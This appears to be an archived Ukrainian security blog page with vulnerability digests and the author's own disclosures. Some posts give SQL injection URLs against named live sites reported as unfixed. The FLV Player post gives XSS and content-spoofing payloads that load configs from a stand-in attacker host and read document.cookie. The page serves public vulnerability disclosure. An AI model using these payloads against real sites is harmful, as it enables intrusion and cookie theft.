Архів для категорії 'Уразливості'

Добірка уразливостей

17:29 29.08.2011

В даній добірці уразливості в веб додатках:

  • EMC Avamar sensitive information disclosure vulnerability (деталі)
  • SQL Injection in ReOS (деталі)
  • RSA, The Security Division of EMC, announces a fix for potential security vulnerability in RSA Access Manager Server (деталі)
  • XSS in Podcast Generator (деталі)
  • Path disclosure in Podcast Generator (деталі)
  • SAP Crystal Reports 2008 - Multiple XSS (деталі)
  • Symantec IM Manager Administrative Interface IMAdminSchedTask.asp Eval Code Injection Remote Code Execution Vulnerability (деталі)
  • vBulletin 4.1.2 0-day Denial Of Service Exploit (деталі)
  • IBM Lotus Domino Server Controller Authentication Bypass Remote Code Execution Vulnerability (деталі)
  • XSRF (CSRF) in UMI.CMS (деталі)

Уразливості на www.br-ua.com

23:59 27.08.2011

04.11.2010

У липні, 07.07.2010, я знайшов Cross-Site Scripting та Brute Force уразливості на проекті http://www.br-ua.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

27.08.2011

XSS:

Brute Force:

http://www.br-ua.com/admin/

Дані уразливості досі не виправлені.

Уразливість на kvadrat.ua

23:51 26.08.2011

29.10.2010

У липні, 06.07.2010, я знайшов SQL Injection уразливість на сайті http://kvadrat.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.08.2011

SQL Injection:

http://kvadrat.ua/index.php?content_id=-1%20or%20version()=5

Дана уразливість досі не виправлена.

Добірка уразливостей

17:35 26.08.2011

В даній добірці уразливості в веб додатках:

  • HP MFP Digital Sending Software Running on Windows, Authentication Bypass (деталі)
  • TinyWebGallery: XSS + Directory Traversal (деталі)
  • SQL Injection in ReOS (деталі)
  • Hewlett-Packard Client Automation radexecd.exe Remote Code Execution Vulnerability (деталі)
  • SQL Injection in ReOS (деталі)
  • HP Client Automation Enterprise (HPCA) Running on Windows, Remote Execution of Arbitrary Code (деталі)
  • Local File Inclusion in Podcast Generator (деталі)
  • SQL Injection in ReOS (деталі)
  • nostromo nhttpd directory traversal leading to arbitrary command execution (деталі)
  • Local File Inclusion in ReOS (деталі)

Уразливість на stella.kiev.ua

23:53 25.08.2011

27.10.2010

У липні, 06.07.2010, я знайшов SQL Injection уразливість на сайті http://stella.kiev.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

25.08.2011

SQL Injection:

http://stella.kiev.ua/index.php?content_id=-1%20or%20version()=5

Дана уразливість досі не виправлена.

Content Spoofing та XSS уразливості в FLV Player

23:59 20.08.2011

21.04.2011

У лютому, 24.02.2011, я знайшов Content Spoofing та Cross-Site Scripting уразливості в флеш відео плеері FLV Player. Які я виявив на одному сайті, що використовує даний веб додаток. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

20.08.2011

Content Spoofing:

Флешки плеєра FLV Player приймають довільні адреси в параметрі configxml, що дозволяє підробити вміст флешки - наприклад, вказавши адресу з файлом конфігурації з іншого сайта.

http://site/player_flv.swf?configxml=http://attacker/1.xml
http://site/player_flv_maxi.swf?configxml=http://attacker/1.xml
http://site/player_flv_multi.swf?configxml=http://attacker/1.xml

Флешки плеєра FLV Player приймають довільні адреси в параметрі config, що дозволяє підробити вміст флешки - наприклад, вказавши адресу з файлом конфігурації з іншого сайта.

http://site/player_flv.swf?config=http://attacker/1.txt
http://site/player_flv_maxi.swf?config=http://attacker/1.txt
http://site/player_flv_multi.swf?config=http://attacker/1.txt

Флешки плеєра FLV Player дозволяють підробити всі важливі параметри, в тому числі flv і startimage, і при цьому приймають довільні адреси в параметрах flv і startimage, що дозволяє підробити вміст флешки - наприклад, вказавши адреси відео і зображення з іншого сайта. А для вказання лінки на довільний сайт можна використати параметри onclick і ondoubleclick.

http://site/player_flv.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_maxi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_multi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_mini.swf?flv=http://attacker/1.flv

XSS:

http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie)
http://site/player_flv_multi.swf?onclick=javascript:alert(document.cookie)
http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(document.cookie)
http://site/player_flv_multi.swf?ondoubleclick=javascript:alert(document.cookie)
http://site/player_flv_maxi.swf?configxml=http://attacker/xss.xml
http://site/player_flv_multi.swf?configxml=http://attacker/xss.xml

Файл xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<config>
<param name="onclick" value="javascript:alert(document.cookie)" />
<param name="ondoubleclick" value="javascript:alert(document.cookie)" />
</config>

http://site/player_flv_maxi.swf?config=http://attacker/xss.txt
http://site/player_flv_multi.swf?config=http://attacker/xss.txt

Файл xss.txt:

onclick=javascript:alert(document.cookie)
ondoubleclick=javascript:alert(document.cookie)

Коде виконається після кліка (чи подвійного кліка). Це strictly social XSS.

Уразливі версії MINI, NORMAL, MAXI та MULTI плеєра. Зазначу, що версія NORMAL зустрічається під іменами player_flv.swf і player_flv_classic.swf. Автор FLV Player так і не виправив дані уразливості.

Добірка уразливостей

17:25 20.08.2011

В даній добірці уразливості в веб додатках:

Уразливість на www.mayster.info

23:54 19.08.2011

24.11.2010

У липні, 03.07.2010, я знайшов SQL Injection уразливість на сайті http://www.mayster.info. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

19.08.2011

SQL Injection:

http://www.mayster.info/index.php?content_id=-1%20or%20version()%3E5

Дана уразливість досі не виправлена.

Уразливості в плагінах для WordPress №49

23:52 18.08.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WP e-Commerce, eShop та WP-Stats-Dashboard. Для котрих з’явилися експлоіти. WP e-Commerce - це плагін для створення онлайн магазину, eShop - це інший плагін для створення онлайн магазину, WP-Stats-Dashboard - це плагін для виведення статистики з wordpress.com.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

15:37 18.08.2011

В даній добірці уразливості в веб додатках:

  • Hewlett-Packard StorageWorks File Migration Agent Remote Archive Tampering Vulnerability (деталі)
  • Path disclosure in Hycus CMS (деталі)
  • Apache CouchDB Cross Site Scripting Issue (деталі)
  • VirtueMart eCommerce for Joomla <= 1.1.6 Blind SQL Injection (деталі)
  • weechat does not properly use gnutls and allow an attacker to bypass certificate verification (деталі)
  • Drupal Custom Pagers Module XSS (деталі)
  • subversion security update (деталі)
  • Drupal Panels 5.x-1.2 XSS Vulnerability (деталі)
  • proftpd-dfsg security update (деталі)
  • Path disclosure in Redaxscript (деталі)